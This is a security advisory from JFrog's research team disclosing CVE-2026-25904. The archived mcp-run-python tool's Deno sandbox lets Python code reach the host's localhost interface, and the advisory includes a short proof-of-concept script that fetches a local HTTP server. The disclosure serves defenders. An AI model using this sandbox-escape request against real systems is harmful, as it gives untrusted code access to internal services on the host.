JFrog Security Research
< Back

JFSA-2026-001653029 - mcp-run-python Deno SSRF

CVE-2026-25904 | CVSS 5.8

JFrog Severity:medium

Discovered ByNatan Nehoraiof the JFrog Security Research Team

Published 9 Feb, 2026 | Last updated 9 Feb, 2026

Overly permissive Deno configuration in mcp-run-python leads to SSRF

mcp-run-python

(,)

The Pydantic-AI MCP Run Python tool configures the Deno sandbox with an overly permissive configuration that allows the underlying Python code to access the localhost interface of the host to perform SSRF attacks. Note - the "mcp-run-python" project is archived and unlikely to receive a fix.

  1. Configure Claude-Desktop or any other MCP Client to use the Pydantic-AI MCP Run Python tool:

    {
"mcpServers": {
"mcp-run-python":{
        "command": "uvx",
        "args": [
        "mcp-run-python",
        "stdio"
        ]
    }
  }
}

  2. Start a HTTP server listening to the localhost interface:

    python3 -m http.server -b 127.0.0.1 1234

  3. Ask the MCP client to run this PoC code:

    from pyodide.http import pyfetch
response = await pyfetch("http://localhost:1234")
data = await response.text()
print(data)
  4. View that the localhost server got a request from the tool

No mitigations are supplied for this issue

< Back